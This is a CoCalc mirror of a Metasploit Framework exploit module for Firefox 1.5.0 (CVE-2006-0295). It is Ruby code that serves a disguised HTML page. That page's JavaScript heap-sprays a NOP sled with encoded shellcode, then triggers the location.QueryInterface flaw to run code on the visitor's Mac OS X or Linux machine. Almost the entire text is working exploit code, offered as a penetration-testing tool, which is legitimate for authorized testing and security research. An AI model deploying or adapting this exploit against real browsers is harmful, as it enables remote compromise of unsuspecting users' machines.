CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/firefox_queryinterface.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'           => 'Firefox location.QueryInterface() Code Execution',

17
      'Description'    => %q{

18
          This module exploits a code execution vulnerability in the Mozilla

19
        Firefox browser. To reliably exploit this vulnerability, we need to fill

20
        almost a gigabyte of memory with our nop sled and payload. This module has

21
        been tested on OS X 10.3 with the stock Firefox 1.5.0 package.

22
      },

23
      'License'        => MSF_LICENSE,

24
      'Author'         =>  ['hdm'],

25
      'References'     =>

26
        [

27
          ['CVE', '2006-0295'],

28
          ['OSVDB', '22893'],

29
          ['BID', '16476'],

30
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],

31
        ],

32
      'Payload'        =>

33
        {

34
          'Space'    => 1000 + (rand(256).to_i * 4),

35
          'BadChars' => "\x00",

36
        },

37
      'Platform'       => %w{ osx linux },

38
      'Targets'        =>

39
        [

40
          [ 'Firefox 1.5.0.0 Mac OS X',

41
            {

42
              'Platform' => 'osx',

43
              'Arch' => ARCH_PPC

44
            }

45
          ],

46


47
          [ 'Firefox 1.5.0.0 Linux',

48
            {

49
              'Platform' => 'linux',

50
              'Arch' => ARCH_X86,

51
            }

52
          ],

53
        ],

54
      'DisclosureDate' => '2006-02-02'

55
      ))

56
  end

57


58
  def on_request_uri(cli, request)

59


60
    # Re-generate the payload

61
    return if ((p = regenerate_payload(cli)) == nil)

62


63
    print_status("Sending #{self.name}")

64
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

65
    handler(cli)

66
  end

67


68
  def generate_html(payload)

69


70
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

71
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

72


73
    return <<-EOF

74
<html>

75
<head>

76
<title>One second please...</title>

77
<script language="javascript">

78


79
function BodyOnLoad() {

80
  h = FillHeap();

81
  location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));

82
};

83


84
function FillHeap() {

85
  // Filler

86
  var m = "";

87
  var h = "";

88
  var a = 0;

89


90
  // Nop sled

91
  for(a=0; a<(1024*256); a++)

92
    m += unescape("#{enc_nops}");

93


94
  // Payload

95
  m += unescape("#{enc_code}");

96


97
  // Repeat

98
  for(a=0; a<1024; a++)

99
    h += m;

100


101
  // Return

102
  return h;

103
}

104
</script>

105
</head>

106
<body onload="BodyOnLoad()">

107
</body>

108
</html>

109
EOF

110
  end

111
end

112


113